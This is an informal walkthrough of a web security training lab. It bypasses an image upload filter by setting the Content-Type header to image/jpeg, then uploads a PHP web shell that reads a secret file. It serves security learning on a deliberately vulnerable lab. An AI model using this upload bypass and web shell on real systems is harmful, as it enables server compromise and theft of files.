info:

This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.

Goal:

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

First i will open the app and upload the php file like this

shell.php have this content

<?php 
echo file_get_contents('/home/carlos/secret'); 
?>

and upload it after upload it we will got message like this

he said that not allowed image/jpeg and image/png

so i will add the

we will replace the content and add this content type : Content-Type: image/jpeg

send it we will got 200 ok

so now we need to accces this photo in url

we will go to the /files/avatarts/shell.php

Congrats we solved the lab